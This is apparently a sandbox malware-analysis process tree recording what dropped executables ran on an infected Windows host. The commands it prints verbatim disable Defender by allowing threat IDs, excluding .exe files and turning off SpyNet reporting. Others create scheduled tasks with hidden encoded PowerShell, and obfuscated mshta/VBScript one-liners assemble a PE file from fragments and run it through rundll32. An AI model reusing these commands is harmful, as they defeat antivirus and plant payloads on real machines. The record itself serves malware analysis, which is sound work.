C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDURZHchH" /SC once /ST 17:09:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 23:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\wbNdLoJ.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Users\Admin\Documents\BvPolz1JLrEUFfkyuKjjUWkz.exe"C:\Users\Admin\Documents\BvPolz1JLrEUFfkyuKjjUWkz.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 17287⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\M0b_iMMm_NntnJ8MGOKj6MkG.exe"C:\Users\Admin\Documents\M0b_iMMm_NntnJ8MGOKj6MkG.exe"6⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7822176.scr"C:\Users\Admin\AppData\Roaming\7822176.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\6296066.scr"C:\Users\Admin\AppData\Roaming\6296066.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6165866.scr"C:\Users\Admin\AppData\Roaming\6165866.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4918688.scr"C:\Users\Admin\AppData\Roaming\4918688.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4587551.scr"C:\Users\Admin\AppData\Roaming\4587551.scr" /S8⤵
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Users\Admin\Documents\DCOPiLwlD2B11rHJvQSil2Vm.exe"C:\Users\Admin\Documents\DCOPiLwlD2B11rHJvQSil2Vm.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5668 -s 2767⤵
- Drops file in Program Files directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\twMoMLoRsEqcicxGqTfnSfAd.exe"C:\Users\Admin\Documents\twMoMLoRsEqcicxGqTfnSfAd.exe"6⤵
-
C:\Users\Admin\Documents\E7nn_1406j8v_DAvaZ603zjG.exe"C:\Users\Admin\Documents\E7nn_1406j8v_DAvaZ603zjG.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\U5LisTvMX5gU8okdeY7zz5Yy.exe"C:\Users\Admin\Documents\U5LisTvMX5gU8okdeY7zz5Yy.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\mTXXJdaUVWyjB_RdGHtfT7zu.exe"C:\Users\Admin\Documents\mTXXJdaUVWyjB_RdGHtfT7zu.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 2687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\FagG1SGQfnP6IjkfVBdFalhu.exe"C:\Users\Admin\Documents\FagG1SGQfnP6IjkfVBdFalhu.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\9GvwD_b5Wbw2W6pqbc6bz_pf.exe"C:\Users\Admin\Documents\9GvwD_b5Wbw2W6pqbc6bz_pf.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\QJDpWADJj1cP20LBomCpIKc_.exe"C:\Users\Admin\Documents\QJDpWADJj1cP20LBomCpIKc_.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\QJDpWADJj1cP20LBomCpIKc_.exe"C:\Users\Admin\Documents\QJDpWADJj1cP20LBomCpIKc_.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\3cz5pAmGIdhR8wlRxJOvpwBP.exe"C:\Users\Admin\Documents\3cz5pAmGIdhR8wlRxJOvpwBP.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\DikJUILtVInXVuxBg8rN_S9U.exe"C:\Users\Admin\Documents\DikJUILtVInXVuxBg8rN_S9U.exe"6⤵
-
C:\Users\Admin\Documents\n1SlVGQ44lcYrFuYBI4Z3Kwx.exe"C:\Users\Admin\Documents\n1SlVGQ44lcYrFuYBI4Z3Kwx.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\77eW5iVFnAmHMmCyd37f2UET.exe"C:\Users\Admin\Documents\77eW5iVFnAmHMmCyd37f2UET.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Plj_3DiKRZBFwjHkdIqlcQSo.exe"C:\Users\Admin\Documents\Plj_3DiKRZBFwjHkdIqlcQSo.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\eP8lcsQGOehF7sD3K5VOIPec.exe"C:\Users\Admin\Documents\eP8lcsQGOehF7sD3K5VOIPec.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\6Vl3UOGOKgm7tmbpGrWoS6EW.exe"C:\Users\Admin\Documents\6Vl3UOGOKgm7tmbpGrWoS6EW.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 2409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\q_32FHm0SaBpvu9Lsl8eQRGQ.exe"C:\Users\Admin\Documents\q_32FHm0SaBpvu9Lsl8eQRGQ.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\q_32FHm0SaBpvu9Lsl8eQRGQ.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Documents\q_32FHm0SaBpvu9Lsl8eQRGQ.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\q_32FHm0SaBpvu9Lsl8eQRGQ.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Documents\q_32FHm0SaBpvu9Lsl8eQRGQ.exe" ) do taskkill /f -Im "%~nXw"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "q_32FHm0SaBpvu9Lsl8eQRGQ.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵
-
C:\Users\Admin\Documents\AIpJJQDQPZMx4uKnXME51tF2.exe"C:\Users\Admin\Documents\AIpJJQDQPZMx4uKnXME51tF2.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp89D2_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp89D2_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp89D2_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp89D2_tmp.exe10⤵
-
C:\Users\Admin\Documents\r1JqoD8K6NsVvXlRFvzwM85d.exe"C:\Users\Admin\Documents\r1JqoD8K6NsVvXlRFvzwM85d.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\r1JqoD8K6NsVvXlRFvzwM85d.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\r1JqoD8K6NsVvXlRFvzwM85d.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\r1JqoD8K6NsVvXlRFvzwM85d.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\r1JqoD8K6NsVvXlRFvzwM85d.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "r1JqoD8K6NsVvXlRFvzwM85d.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
-
C:\Users\Admin\Documents\cOeGLr7dASbjtnhvfRsmCEBo.exe"C:\Users\Admin\Documents\cOeGLr7dASbjtnhvfRsmCEBo.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7679.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8C72.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
